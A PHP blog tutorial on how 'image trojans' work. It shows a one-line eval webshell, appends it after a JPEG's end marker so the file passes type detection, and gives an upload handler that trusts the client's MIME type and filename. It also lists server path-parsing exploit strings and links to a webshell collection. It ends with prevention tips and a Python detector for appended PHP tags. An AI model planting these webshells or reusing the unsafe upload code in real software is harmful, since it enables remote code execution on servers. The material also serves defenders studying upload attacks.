How a PHP image trojan works
<h1>What is a trojan</h1><p>A trojan is a piece of malicious code with special functionality hidden inside an otherwise normal program: a backdoor that can destroy or delete files, exfiltrate passwords, log keystrokes, launch DoS attacks and so on.</p>
<p>So what does a PHP trojan look like? Take the following code:</p>
<pre><code class="php"><?php
@eval($_GET['tioncico']);
</code></pre>
<p>What does this line mean? Whatever arrives in $_GET['tioncico'] is executed directly as PHP code, for example:</p>
<p>http://test.cn/a/test.jpg/1.php?tioncico=echo%20tioncico;</p>
<p>Ignoring everything before the question mark, the query string is tioncico=echo tioncico; (%20 is the URL-encoded space).</p>
<h1>How an image trojan works</h1>
<p>This article is about uploading image trojans, so how is an image trojan made?</p>
<p>First, how a PHP file upload works:</p>
<p>1: The user submits a POST request that uploads the file</p>
<p>2: The server receives the request and stores the file as a temporary file</p>
<p>3: PHP parses the temporary file to obtain its file type and size</p>
<p>4: PHP checks the file type and moves the temporary file into the upload directory</p>
<p>5: PHP reports success to the front end and returns the file's address</p>
<p>In step 3, how does PHP parse the temporary file?</p>
<p>Every file format carries its own signature at the start of the file content. Convert the file to hexadecimal and compare it against the header definitions of the various formats and you know the file type. For example, a JPEG file begins with the 2-byte marker 0xff, 0xd8 and ends with the 2-byte marker 0xff, 0xd9.</p>
<p>Reading the file's bytes and converting them to hex tells us what type the file is:</p>
<pre><code class="php">// Return the whole file as a hex string so the header and trailer bytes can be inspected
function fileToHex($file){
    if(file_exists($file)){
        $data = file_get_contents($file);
        return bin2hex($data);
    }
    return '';
}

echo fileToHex('F:\www\test\a\1.jpg.txt');
</code></pre>
<p>This function is a minimal implementation; for more complex needs look into it yourself.</p>
<p>Output:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580525491539016.png"></p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580525508734262.png"></p>
<p>Clearly this image format is JPEG.</p>
<p>PHP already implements image format detection at the low level, so there is no need to implement it ourselves. For the definitions of file type headers see:</p>
<p>https://blog.csdn.net/LiuBuZhuDeFanHua/article/details/82949144</p>
<p>Now the question: if I leave the file header unchanged and append a string of PHP code at the end, how does PHP identify the type?</p>
<p>Let's try it: write a PHP file after the end of the image file:</p>
<pre><code class="php">$path = 'F:\www\test\a\1.jpg.txt';

// Append the contents of 1.php after the image's EOI marker; 1.php is a trojan file
file_put_contents($path, file_get_contents('./a/1.php'), FILE_APPEND);
</code></pre>
<p>Opening it as a text file, the appended data is visible:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580525831359024.png"></p>
<p>Opening 1.jpg directly as an image shows that the file is not corrupted:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580525862339528.png"></p>
<p>Uploading the file, PHP also identifies it as jpeg:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580526017930502.png"></p>
<h1>How PHP parses the trojan</h1>
<p>Look at the following code; ignore what the PHP does and look only at the structure:</p>
<pre><code class="php"><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
<form action="" enctype="multipart/form-data" method="post" name="uploadfile">上传文件:<input type="file" name="upfile"/><br/>
    <input type="submit" value="上传"/>
</form>
<?php
if(@is_uploaded_file($_FILES['upfile']['tmp_name'])){
    $upfile=$_FILES["upfile"];
    //read the values out of the array
    $name=$upfile["name"];//name of the uploaded file
    $type=$upfile["type"];//MIME type of the uploaded file, as claimed by the client
    $size=$upfile["size"];//size of the uploaded file
    $tmp_name=$upfile["tmp_name"];//temporary path of the uploaded file
    //check whether it is an image (only by the client-supplied MIME type)
    $okType=false;//default, so the flag is defined when no case matches
    switch($type){
        case 'image/pjpeg':$okType=true;
            break;
        case 'image/jpeg':$okType=true;
            break;
        case 'image/gif':$okType=true;
            break;
        case 'image/png':$okType=true;
            break;
    }
    if($okType){
        /**
         *0: upload succeeded
         *1: exceeds the size limit set in php.ini
         *2: exceeds the size given by the MAX_FILE_SIZE option
         *3: the file was only partially uploaded
         *4: no file was uploaded
         *5: the uploaded file size is 0
         */

        $error=$upfile["error"];
        echo "=======================<br/>";
        echo "上传文件名称是:".$name."<br/>";
        echo "上传文件类型是:".$type."<br/>";
        echo "上传文件大小是:".$size."<br/>";
        echo "上传后系统返回的值是:".$error."<br/>";
        echo "上传文件的临时存放路径是:".$tmp_name."<br/>";

        echo "开始移动上传文件<br/>";
        //create the up directory if it does not exist
        $dir='up/';
        if(!is_dir($dir)){
            mkdir($dir);
        }
        //move the temporary upload into the up directory, keeping the client-supplied name
        move_uploaded_file($tmp_name,'up/'.$name);
        $destination="up/".$name;
        echo "=======================<br/>";
        echo "上传信息:<br/>";
        if($error==0){
            echo "文件上传成功啦!";
            echo "<br/>图片预览<br/>";
            echo "<img src=".$destination;
            echo " alt=\"图片预览:\r文件名:".$destination."\r上传时间:\">";
        }else if($error==1){
            echo "超过了文件的大小,在php.ini文件中设置";
        }else if($error==2){
            echo "超过了文件的大小MAX_FILE_SIZE选项中设置";
        }else if($error==3){
            echo "文件只有部分被上传";
        }else if($error==4){
            echo "文件没有被上传";
        }else{
            echo "上传文件大小为0";
        }

    }else{
        echo "请上传jpg,gif,png等格式的图片";
    }
}
?>
</body>
</code></pre>
<p>This is ordinary code, a mix of PHP and HTML tags: PHP parses the <?php ?> tags and executes only the code inside them.</p>
<p>Now replace this code with image data + PHP tags:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580526212577663.png"></p>
<p>Change the extension to php and see whether it runs:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580526258495611.png"></p>
<p>Clearly it runs normally: PHP output the characters outside the <?php tag as plain text and executed only the PHP part.</p>
<h1>Running the image file</h1>
<p>By now we have learned how to add a trojan to an image and understand how an image trojan works. So how would this trojan be executed on someone else's site? By renaming the image to .php? Obviously we cannot do that, so what then?</p>
<p>We need the help of a vulnerability to execute it (which means a trojan is not all-powerful and cannot break into every site).</p>
<p>The vulnerability routes are as follows</p>
<h2>include vulnerability</h2>
<p>Whenever the target's PHP code contains include xxxx, where xxxx can be supplied from an external parameter,</p>
<p>for example in some developers' home-grown frameworks, where include controller loads the controller by a full path supplied from outside.</p>
<h2>Web server pathinfo vulnerabilities</h2>
<p>Parsing via vulnerabilities in the web server that runs alongside PHP; the following is taken from: https://www.v2ex.com/amp/t/414740/2</p>
<p>IIS 6.0 parsing vulnerability: 1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg <br>IIS 7.0/IIS 7.5/Nginx <8.03 malformed parsing: 1.jpg/.php <br>Nginx <8.03 null-byte code execution vulnerability: 1.jpg%00.php <br>Apache parsing vulnerability: .php. followed by an invalid extension <br>And then there are the various truncations on Windows: because the Windows environment does not allow certain characters in file names, the file name can end up truncated.</p>
<p>For example, I reproduced it successfully with phpstudy nginx/1.11.5 + php7.2.10:</p>
<p><img src="http://image.php20.cn/Upload/image/ueditor/20200201/1580527430381557.png"></p>
<p>To explain: my site contains a/test.jpg; requesting test.cn/a/test.jpg/1.php makes nginx resolve it to a/test.jpg and hand it to PHP, which executes it; the GET parameter tioncico=echo%20%27仙士可牛逼!%27; is parsed by PHP and outputs 仙士可牛逼!</p>
<p>You can test the other vulnerabilities yourself.</p>
<h1>Preventing the vulnerability</h1>
<p>1: Upgrade the web server; use a recent version wherever possible</p>
<p>2: Store images in OSS (object storage) if possible, or make sure the image upload directory has no execute permission (that is, the web server must not execute scripts from the image directory)</p>
<p>3: Where possible, re-process uploaded images so that the trojan content is filtered out</p>
<p>4: Never trust user input</p>
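<p>As an added example (not code from the original article), the following Python script shows the content check a server-side upload filter would want, both for the append experiment above and for prevention item 3: it walks the JPEG marker structure to the real EOI marker, reports any bytes after it, and also flags a PHP open tag anywhere in the file (a metadata segment as well as the trailer). The byte streams in build_sample_jpeg are constructed for the demonstration and are not decodable pictures.</p>

```python
import re
import struct

# Matches a PHP open tag. Bare "<?" is deliberately excluded: XMP metadata
# legitimately starts with "<?xml" inside APP1 segments and would false-positive.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def jpeg_image_end(data: bytes) -> int:
    """Walk the JPEG marker structure and return the offset just past the EOI
    marker (FF D9), or -1 if the data is not a well-formed JPEG stream."""
    if len(data) < 4 or data[:2] != b"\xff\xd8":
        return -1
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            return -1
        marker = data[pos + 1]
        if marker == 0xFF:                      # fill byte, keep looking for the marker
            pos += 1
            continue
        if marker == 0xD9:                      # EOI: the image proper ends here
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            pos += 2                            # stand-alone markers without a length
            continue
        if pos + 4 > len(data):
            return -1
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if seg_len < 2:
            return -1
        pos += 2 + seg_len
        if marker == 0xDA:                      # SOS: skip the entropy-coded data
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                # FF00 is a stuffed byte and FFD0-FFD7 are restart markers; both
                # belong to the scan, anything else is the next real marker.
                if data[pos] == 0xFF and nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return -1


def scan_jpeg(data: bytes) -> dict:
    """Report whether a JPEG carries bytes after EOI and whether a PHP open tag
    appears anywhere in the file (trailer or metadata segment)."""
    end = jpeg_image_end(data)
    if end < 0:
        return {"valid_jpeg": False, "trailing_bytes": 0,
                "php_in_trailer": False, "php_anywhere": False}
    trailer = data[end:]
    return {
        "valid_jpeg": True,
        "trailing_bytes": len(trailer),
        "php_in_trailer": PHP_OPEN_TAG.search(trailer) is not None,
        "php_anywhere": PHP_OPEN_TAG.search(data) is not None,
    }


def build_sample_jpeg(comment: bytes = b"", trailer: bytes = b"") -> bytes:
    """Constructed, minimal JPEG-shaped byte stream (not a decodable picture):
    SOI, APP0, optional COM segment, SOS with stuffed/restart bytes, EOI."""
    app0_payload = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    parts = [b"\xff\xd8", b"\xff\xe0", struct.pack(">H", len(app0_payload) + 2), app0_payload]
    if comment:
        parts += [b"\xff\xfe", struct.pack(">H", len(comment) + 2), comment]
    sos_payload = b"\x01\x01\x00\x00\x3f\x00"
    parts += [b"\xff\xda", struct.pack(">H", len(sos_payload) + 2), sos_payload]
    parts.append(b"\x12\xff\x00\x34\xff\xd0\x56")   # scan data containing FF00 and RST0
    parts.append(b"\xff\xd9")
    return b"".join(parts) + trailer


if __name__ == "__main__":
    clean = build_sample_jpeg()
    appended = build_sample_jpeg(trailer=b"<?php echo 1; ?>")   # the article's append trick
    hidden = build_sample_jpeg(comment=b"<?php echo 1; ?>")     # tag inside a COM segment
    for name, blob in (("clean", clean), ("appended", appended), ("comment", hidden)):
        print(name, scan_jpeg(blob))
```

<p>A header-only check such as getimagesize() passes all three samples, which is exactly why the uploaded file in the screenshots was accepted as jpeg; this walker reports the trailer and the embedded tag instead.</p>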
<h1>Other</h1>
<p>The eval-based trojan file above looks simple and easy to recognise, doesn't it?</p>
<p>Moreover, eval may well be one of the dangerous functions disabled in PHP. So what can be used instead?</p>
<p>For the various ways of writing trojans see https://github.com/tioncico/webshell/tree/master/php</p>
<p>One more remark: once a PHP file can be executed, the image file can of course include another image file, and so on.</p>
<p class="b-copyright">This article is an original post by 仙士可; it may be reproduced without contacting me, but please credit 仙士可's blog www.php20.cn</p><br><br>
Source: https://www.cnblogs.com/myJuly/p/12973832.html